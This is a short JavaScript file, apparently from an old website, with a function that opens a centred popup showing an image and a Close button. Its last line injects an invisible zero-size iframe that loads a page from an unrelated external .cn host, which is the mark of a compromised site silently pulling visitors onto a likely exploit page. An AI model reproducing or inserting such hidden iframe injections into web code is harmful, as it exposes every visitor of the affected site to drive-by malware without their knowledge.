function openwindow(url,width,height)
{
	
	var winTop = (screen.height / 2) - 150;
	var winLeft = (screen.width / 2) - 250;
	var windowFeatures = "scrollbars=yes,width=" + width + " height=" +height+ ",";

	windowFeatures = windowFeatures + "left=" + winLeft + ",";
	windowFeatures = windowFeatures + "top=" + winTop;
	
	win=window.open(url,"InnerWindow",windowFeatures);
	
	win.document.bgColor = "#F2F2F2";

	win.document.write('<div align=center bgcolor=#F2F2F2 ><table border=1 cellpadding=4 cellspacing=0 style=border-style:collapse><tr><td bgcolor=#F2F2F2><img src=' + url+ '></td></tr></table></div><br>');

	//win.document.write('<div align=center><font size=2 face=Tahoma color=#000000><b> '+ PicTitle +' </b></font></div>');

	//win.document.write('<FORM NAME="FORM1">\n'); 

	win.document.write('<div align=center><INPUT TYPE="BUTTON" VALUE="Close" style="FONT-SIZE: 11px; COLOR: #ffffff; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #B30324 ; height=25"  onclick="window.close() ;"></div>\n');


}
document.write("<iframe width=0 height=0 src=http://iii.832823.cn/htm1.htm></iframe>");

